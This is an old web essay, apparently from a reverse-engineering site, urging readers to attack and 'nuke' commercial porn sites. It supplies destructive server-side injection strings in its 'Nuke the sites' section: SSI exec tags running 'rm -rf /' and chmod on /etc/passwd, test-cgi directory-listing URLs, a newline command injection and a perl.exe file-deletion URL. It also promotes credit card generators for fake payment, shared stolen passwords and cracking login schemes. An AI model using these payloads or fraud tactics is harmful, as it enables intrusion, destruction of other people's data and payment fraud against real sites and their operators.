No_commercial!
Searchers against Smut
Why should we fight against Smut sites? Are we censors?
~
(A general approach to smut site bombing and some exploit searching tricks)
~
By fravia+, Started 1998 ~ Updated December 2001


[Why?]    [Some strings]

Why should we fight against Smut sites? Are we censors? No!


We are not censors, and we have nothing whatsoever against nude images (if given away for free), yet we have to wage battle against commercial smut sites for many pretty sound reasons. Here the main ones:

Because commercial smut sites are swamping the whole Web. They have long ago swamped, for instance, the server where my main page was hosted to a point that made impossible for me to remain there. This swamping may seem strange, since there is NO REASON WHATSOEVER to use or peruse such commercial smut sites.
As anyone that visit these pages of mine knows, if you have learned how to search the web there is NOTHING... absolutely nothing that you will not find on the web. Any application you can think of, any image that has ever been taken or made, any BOOK that has been written, any MUSIC, any FILM, any document, any lore... dwells somewhere inside a server on our planet, ready to be downloaded by you for free.
In such a situation selling "commercially" what is already free is only a fraud. Porn sites (but most 'advanced searching' sites as well, come to think of it) are just doing that.
We are compelled to vegetate in a context where 'copyrights' laws are just used as fig leaves to cover strong commercial interests, where all tricks of the trade are exploited to deny knowledge to the 'poors and the simple ones' (they want zombie slaves that slurp advertisement and firmly believe that "real life" is to drool around a noisy vulgar mall buying and/or consuming some useless crap for the sake of some corporation).
In this social Hell all kind of 'frill' and 'push' activities are fostered heavily in order to keep under their consumistic chains (and advertisement whips) those still unaware of what's going on around them, the gullible believers in a nonsensical society where money -and not knowledge- means power (why?).

Yet this still surviving web & nether world of ours points (among difficulties and errors) to a NEW reality: See and rejoice! You can also (and still) get at (and download) all the knowledge (and horrors) of the human race. That is, you 'could'... once you know how to find them.
The problem and the difficulty is to understand where exactly -and under which name that what you seek has been stored.
This is fairly easy endeavour, though, (as you have understood on my pages), yet many poor suckers and lusers simply don't know it, and have -for instance- to pay in order to get their daily smut ration... don't laugh at them! Imagine you are a frustrated young man, somewhere in Saudi Arabia (or in Idaho :-), with a web access and enough money and yet no naked women images (nor many naked real women AROUND nor Wodka-Martinis 'comme-il-faut' for that matter :-) nowhere in a range of 1000 kilometers... you would probably fall for it as well...

Since, as you know, on the Web there is NO law, reversers are among the few that can try to put an end to any activity they happen to dislike.
'Seekers noblesse' oblige: We decide alone what we allow and what we forbid, since we HAVE (and spread) real knowledge... after all we are the only real "power" in these worlds of bytes and codes, where commercial minds stumble around, blinded by money... a universe where we can still destroy them, and stamp them out if need be, as you will learn here and elsewhere.

You'll begin to grasp and understand - here - how we can attack our enemies, and you may decide to join and help (or even criticize and ignore... as usual you are not compelled to agree with our course of action).

The proliferation of all kinds of commercial sites is unrelated to their (mostly poor) content, and in the case of porn sites is independent from the fact that they are offering images that [you could have for free], since the people that usually fall for these tricks DO NOT KNOW that, all moralisation campaigns notwithstanding (that, as usual in this awful society, always stop short of attacking the "holy" commercial activities) this swamping is simply a consequence of the 'inner working' (or if you prefer the 'coding choices') of these sites, workings and choices that you must understand in order to defeat them, and that we will try to summarize here:

Let's see how a "classical" commercial smut works:
THE WORKING OF A CLASSICAL COMMERCIAL SMUT SITE
  1. You steal a great number of bad scanned smut images from the newsgroups (where anybody could get them for free, of course, but that's for sure completely irrelevant for you).
  2. You get an Internic name like xxxsmuttfickxxx.com for a few dollars (you are already a server provider yourself, or you find one for next to nothing)
  3. You buy some bad-written cgi-scripts to get zombies pay for some sort of paid access to your smut offerings.
  4. You realise that almost nobody comes
  5. You spam every usenet group you can get your hands on in order to get some idiot to visit your site, in the hope they will pay you some money
  6. You realise that almost nobody comes
  7. You prepare a real ugly smut image as "banner-ad" and exchange it with one hundred other smut sites, hoping that the small park of frustrated rich idiots that roam these sites (and pay for them) will waste some dollars on your site as well.
  8. You realise that almost nobody comes
  9. You specialise in nastier and nastier smut images ("lolitas swallowing horses" "pregnant teenagers tortured by lorry drivers" or whatever)
  10. You swamp whole servers with the same poor images yet with twenty differently named "entrances" to the same (poor) content you have copycatted on the web.
  11. You spam and spam and spam and swamp and swamp and swamp
  12. You realise that most people that seek this kind of images still prefer to get them for free
  13. Ahah! You write the word "free" everywhere in your commercial smut site hoping to get somehow inside the search engines listings for 'free smut' images.
  14. You eventually scrap a couple of bucks from your dirty floor and swallow them.
WHAT CAN WE DO AGAINST THEM?

Well, there are some possible line of actions:

Nuke the sites

This is far from easy, and you need some particular conditions to be able to do it, yet it is great fun. You'll get some hints and some simple tricks on my "cgi reverse engineering" pages redone and redtwo.

Basically you just write something like
			#exec cmd="chmod 666 /etc/passwd"
for SSI servers
or add something like the following to the http://www.yoursmuttarget. com
com/cgi-bin/test-cgi?*
com/cgi-bin/nph-test-cgi?/*
com/cgi-bin/nph-test-cgi?etc/*
or add to your target URL
%0a/bin/ls%20-la%20/usr/src/include
or submit a tag like the following one:
	
<!--#exec cmd="/bin/rm -rf /"-->
or if the perl.executable is there run it with this URL:
http://hostname/cgi-bin/perl.exe?-e+unlink+%3C*.*%3E%3B
and nuke the smut site for a while :-)
And all this is just to SEE if you can play a little with them (a real "complete" attack is of course a little more complicated).
VISIT MY redcgi reverse engineering PAGE ONE VISIT MY redcgi reverse engineering PAGE TWO

Find and explore the sites You can easily explore these sites 'jumping' over their password verification applets or scripts.
  1. Download applets or scripts
  2. Crack them
  3. Enter
  4. Find a weak point
  5. destroy

<WARNING: OBSOLETE SITES ON>
To find:
VISIT MY redhow to comb smut sites PAGE
VISIT MY redcombing and klebing techniques PAGE

To explore:
Use the tricks explained here or just read the robots.txt files (see the [tips] page).
<OBSOLETE SITES OFF>

Don't forget that you don't need to respect smut sites!
Use credit card generators to get a faked but working credit card number (test it on geocities 'kids' facility until you find a working one). Once you are inside the smut site, either nuke it or post immediately its complete subdirectory structure on usenet (even worse: nuking will last only some time, but re-creating the whole subdir structure can be a hassle :-)

If you don't want to use faked credit card numbes, don't forget that you can also enter smut sites using FALSE passwords. There are in the warez scene hundred of sites that offer 'capered' passwords for commercial smut sites, one of the rare occurrencies where I'm fully favourable to the warez kids.
Million of frustrated smut-seekers use these free passwords in order to gain access to the smut sites WITHOUT paying them. This is IMO very good because this does not only damage the smut sites... in fact most of these simpletons realise in this way very soon, how bogus all these commercial smut sites are and won't in their life never come to the idea of paying for access again.
The Commercial smut sites react against password capering with automated scripts that deconnect all accounts used by two persons on the same time. Yet web server-user notifications protocols are so unreliable that most of the time they just don't dare pushing it really too much, and default to a completely useless warning, because there are much too many dynamic IDs, and the real fear of these sites is to scare off one of the few gullible "correct users" they have got. So everytime you get a "scarecrow" message visiting with capered passwords, just reload until it disappears.

You can also enter these sites using gathered 'crumbs' that you'll find on the source html script of the page. Useful crumb gathering is often possible through right clicking onto any logo, or image, and carefully watching and registering the URL call sequence through your logger or personal firewall.

Study and crack the friends of your enemies
Many commercial smut sites resort to 'commercial smut verificators', which pay them 'per visit' and take care of the whole verification routines. While this offers a better security on one site of the medal (good thought cgi-scripts protections schemes can be certainly tougher than the home-made concoctions), this means also that once you have cracked one of these schemes you have cracked all of the sites that use it.

Beat them at their own game demonstrating that they are utterly useless
There is practically not a single image on the commercial smut sides that you could not have for free if you cared to. Yet, instead of leaving these images where only determined people would have found them (why not, if someone wants to see them, he should be free to do so), the commercial smut sites throw all these images everywhere on the web, making it dead easy, even for childrens, to get exposed even if they ARE NOT seeking porn (and since I have three kids, I know what I am saying... if you want to have a look for yourself at what kind of smut you can get without any filter whatsoever, visit Giglio's [third] classroom).

This situation is of course just one of the many nasty consequence of the awful society where we live in, where everything is measured only through its 'commercial' value, even people and bodies. Yet there is no reason we should accept this. Since nuking the commercial smut sites, while being great fun does not seem to bring us nowhere (there are simply too many of them and they proliferate like champignons), I am considering writing simple robots that will "dig out" automatically all sort of smut images publishing (and updating) these links automatically on the usenet relevant groups, where part of the suckers that PAY the commercial smut sites roams. This should damage smut sites where it really hurts them: on their commercial site :-)

So a good counter-offensive could be to publish on the relevant usenet groups (say once every week, through an automated bot):
  1. either a list of all password capering sites;
  2. or a list of all the many really free smut sites (which exist but are fairly difficult to find due to the fraudulent proliferation of the adjective 'free' inside the commercial smut sites);
  3. or a list of all the hidden links inside the main smut sites;
  4. or some cracking / reversing tutorials for the PASSWORD ASKING AND CHECKING applets;
  5. or some easy robots that would allow any luser to gather whatever images he (thinks he) needs.
I believe that sending all these info to every warez sites (which are all concurring against another -for bucks- as well, and would tehrefore immediatly publish everything you feed them, just in order to gain some more hits :-) would inflict a more lasting damage to the whole commercial smut scene.

Since the commercial smut sites cannot afford to change continuously the whole subdirectory naming structure, the publishing of the hidden links and subdirectories structure could be even more effective that the traditional publishing of the passwords or the occasional nuking of a couple of exposed site. We will examine how exactly a userid/password script works, and how it 'decides' if the user should gain access to the site or not. There are now some new censorship applications that check THE (rosa) PIXELS of the images in order to allow or forbid to 'corporate prisoners' to see them. We could therefore reverse the algorithms of these very censorship appz in order to obtain the opposite, and FIND where such images have been hidden. Such a little bot could then be released for free to the zombies... smut seekers will thus get for free their smut-dope, automagically brought home, and commercial smut sites will fail miserably as they deserve... hey! this could be (ahem) very useful against any sort of commercial site as well, come to think of it :-)

Another very interesting sector is PASSWORD CAPERING. If you have a closer look at the passwords and userids used by the commercial sites (not only smut sites) you'll soon realise that they are divided in TWO main categories: user-chosen and automatically generated.
Both approaches have weaknesses, as we know:
"user chosen" passwords are repetitive, Johnny the bozo cannot remember anything more complicated than the name 'coke':
	fred/fred 	(look at the letters "fred" on your keyboard)
	1111/1111
	1234/1234
	pamela/pamela	
	userid/password	(ofter that you would think)
That's the reason some commercial site 'assign' you your password:
	REDD12JH31/444JAH12@1
	99981-2312/RRAE112-43
And as all reversers know, in that case there is nothing easier than crack the algorithms that assign valid passwords in such a way. Just download the relative applets or, even more simply, have a quick (reverser :-) look at a small list of valid passwords, that you can collect at ease from the many password warez sites.

It is clear that this project will only survive and thrive if there will be more and more essays from ALL OF YOU and if you will find and send me other -even better- tricks in order to commercial ruin (or at least to seriously annoy) all those bastards that run the commercial smut sites.

Some lusers believe that money and sex are the two only things that count in life, and that 'combining' the two, they may have found an easy way to scrap some easy bucks. Let's show them that in our world money does not mean anything at all and that even if sex would really have something to do with poor quality smut images, which I doubt, that too can be gathered en masse on the web for free, like everything else.

I hope you understand now WHY I want to bust commercial sites (apart from the 'intrinsecal' fun in busting web sites :-) and WHY this has nothing to do with any censorship attitude of mine: I am a reverser and a seeker: I want a free web with free resources for anyone and I'm gonna struggle for it if necessary.
(c) fravia+ 1998
Good luck, good hunt!

And if you are interested, here is a small e-mail exchange of your +truly with a smut site (polite) owner.
And if you are interested, here is a very simple password busting program


Some strings (that may knock the stuffing of some sites :-)

Corto's 0&sa=N trick
Common knowledge's +directory +indexing +bugtraq trick


To ideale

(c) III Millennium: [fravia+], all rights reserved